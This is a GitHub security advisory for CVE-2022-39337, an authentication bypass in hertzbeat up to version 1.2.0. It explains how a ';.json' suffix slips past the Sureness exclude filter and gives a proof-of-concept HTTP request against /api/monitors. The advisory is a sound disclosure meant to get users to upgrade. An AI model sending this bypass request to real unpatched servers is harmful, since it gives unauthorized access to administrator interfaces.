Skip to content

Permission bypass due to incorrect configuration is on github.com/dromara/hertzbeat

High
tomsun28 published GHSA-434f-f5cw-3rj6 Dec 19, 2023

Package

hertzbeat (hertzbeat)

Affected versions

<=1.2.0

Patched versions

>1.2.0

Description

Impact

hertzbeat <= 1.20 has a permission bypass vulnerability
Permission bypass is a Web security vulnerability. It can bypass system authentication and invoke interfaces without authorization. As a result, the site is in an insecure state, such as directly invoking interfaces used by administrators.

Patches

You are advised to upgrade to the latest version.

Workarounds

You are advised to upgrade to the latest version.

References

https://github.com/dromara/hertzbeat

For more information

sureness filters excludeResource first. If a match is successful, Sureness allows excluderesource directly. If not, Sureness enters the subsequent authentication process. Here because of the use of; A request url such as.json causes the exclude block to be matched, allowing the request to be released. This request is also released due to the springbolt interface feature /aaa; .json will go to /aaa.

GET /api/monitors;.json?app=linux&pageIndex=0&pageSize=8 HTTP/1.1
Host: 1.15.182.88:1157
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://1.15.182.88:1157/monitors?app=linux
Accept-Encoding: gzip, deflate
Connection: close

image

Normal access request:

image

Normal access request without Authorization:

image

Severity

High

CVE ID

CVE-2022-39337

Weaknesses

Credits